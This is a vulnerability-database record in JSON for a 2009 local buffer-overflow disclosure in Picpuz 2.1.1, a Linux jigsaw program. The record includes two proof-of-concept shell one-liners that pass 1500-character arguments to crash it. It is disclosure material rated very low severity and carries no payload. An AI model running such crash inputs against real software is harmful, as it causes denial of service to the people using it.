DATABASE RESOURCES PRICING ABOUT US

{"href": "https://www.seebug.org/vuldb/ssvid-18686", "status": "poc", "bulletinFamily": "exploit", "modified": "2009-12-24T00:00:00", "title": "Picpuz <=2.1.1 Buffer Overflow DoS/PoC", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-18686", "cvelist": [], "description": "No description provided by source.", "viewCount": 5, "published": "2009-12-24T00:00:00", "sourceData": "\n # Exploit Title: Picpuz Buffer Overflow DoS/PoC <=2.1.1\r\n# Date: 24 Dec, 2009\r\n# Author: sandman, n4mdn4s [4T] gmail [D0T] com\r\n# Software Link: http://kornelix.squarespace.com/picpuz/<http://kornelix.squarespace.com/printoxx/>, http://kornelix.squarespace.com/storage/downloads/picpuz-2.1.1.tar.gz<http://kornelix.squarespace.com/storage/downloads/printoxx-2.1.2.tar.gz>\r\n\r\n# Version: <= 2.1.1\r\n# Tested on: Fedora 12\r\n# CVE: None\r\n# Code:\r\n\r\nDescription:\r\n"from website"\r\nPicpuz is a free Linux "jigsaw puzzle" program.\r\n\r\nYou can take almost any image (jpeg, tiff, png ...) and scramble it into many pieces (tens to hundreds). You can\r\n\r\nthen reassemble the picture using the mouse to move the pieces around.\r\n\r\n\r\nVulnerability:\r\nPicpuz does not check the length of input filename/directory thus overwriting the buffer [1000 in size] with a call to strcpy.\r\n\r\n\r\nProof Of Concept:\r\nImage filename overflow:\r\n$ ./picpuz -f $(python -c 'print "A"*1500')\r\n\r\nDirectory filename overflow:\r\n$ ./picpuz -i $(python -c 'print "A"*1500')\r\n\r\n\r\nSeverity: Very Low\r\n\r\n#$\r\n\r\n\n ", "id": "SSV:18686", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T18:20:11", "reporter": "Root", "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645540743, "score": 1659785532, "epss": 1678851499}}

{}